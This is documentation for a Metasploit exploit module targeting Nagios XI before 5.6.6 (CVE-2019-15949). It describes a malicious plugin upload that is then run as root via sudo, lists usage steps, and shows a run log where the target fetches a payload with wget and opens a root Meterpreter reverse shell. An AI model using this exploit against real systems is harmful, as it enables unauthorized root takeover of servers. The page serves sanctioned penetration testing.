adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi_authenticated_rce.md
T
kalba-security 96ae2cf9a2 Incorporate additional suggestions from code review.
2020-03-09 11:56:15 +02:00

5.6 KiB
Raw Blame History

Introduction

This module exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root.

The module first checks if the supplied credentials are valid and belong to a user with permissions to modify plugins. It then exploits these permissions by uploading a malicious plugin to the target and subsequently sending an HTTP GET request to profile.php?cmd=download. This request downloads a system profile from the server and in the process launches the getprofile.sh script as root via a passwordless sudo entry. This script executes the malicious plugin as root.

For all supported targets except Linux (cmd), the module uses a command stager to write the exploit to the target via the malicious plugin. However, this method may not work if Nagios XI is running in a restricted Unix environment like a minimal/custom CentOS installation. In the latter case, the target must be set to Linux (cmd). For this target, the module writes the payload directly to the malicious plugin while avoiding commands that may not be supported in a restricted environment. It is recommended to use the target's default cmd/unix/reverse_bash payload in this scenario.

If the target is found to be vulnerable but the module completes without establishing a session, try increasing the value of WfsDelay (the additional delay when waiting for a session). The default value of this advanced option is 10 seconds. To check it, run show advanced. Other possible solutions are changing the payload, manually setting the value of the CMDSTAGER::FLAVOR advanced option, and setting the target to Linux (cmd) as explained above.

Valid credentials for a user with administrative privileges are required. This module was successfully tested on Nagios XI 5.6.5 running on CentOS 7. Please note that the module may behave differently when run against older versions of Nagios XI. For instance, during a test against Nagios XI 5.4.10, the module failed to trigger execution of the payload. Instead, the payload was executed randomly after a period of time (up to 5 minutes). Moreover, the session that was ultimately established, was not a root session.

Vulnerable system

Nagios XI before 5.6.6.

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/linux/http/nagiosxi_authenticated_rce
  4. Do: set RHOSTS [IP]
  5. Do: set SRVHOST [IP]
  6. Do: set USERNAME [username]
  7. Do: set PASSWORD [password]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: set LPORT [port]
  11. Do: exploit

Options

  1. USERNAME. The username to authenticate with. This user should have permissions to modify plugins. The default setting is nagiosadmin, which is the default admin account for Nagios XI systems.
  2. PASSWORD. The password to authenticate with.

Targets

  1. Linux (x86)
  2. Linux (x64) # This is the default target.
  3. Linux (cmd) # If wget is not installed on the target, this target should be selected together with the payload cmd/unix/reverse_bash.

Scenarios

msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options

Module options (exploit/linux/http/nagiosxi_authenticated_rce):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   PASSWORD   P@ssw0rd!             yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.1           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                    yes       The target port (TCP)
   SRVHOST    192.168.1.2           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                     yes       Base path to NagiosXI
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin           yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Found Nagios XI application with version 5.6.5.
[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100% done (121/121 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting for the plugin to request the final payload...
[*] Client 192.168.1.1 (Wget/1.14 (linux-gnu)) requested /eFFP5lYvZ8eCnR0
[*] Sending payload to 192.168.1.1 (Wget/1.14 (linux-gnu))
[*] Sending stage (3021284 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

References

  1. https://github.com/jakgibb/nagiosxi-root-rce-exploit
  2. https://nvd.nist.gov/vuln/detail/CVE-2019-15949
Reference in New Issue View Git Blame Copy Permalink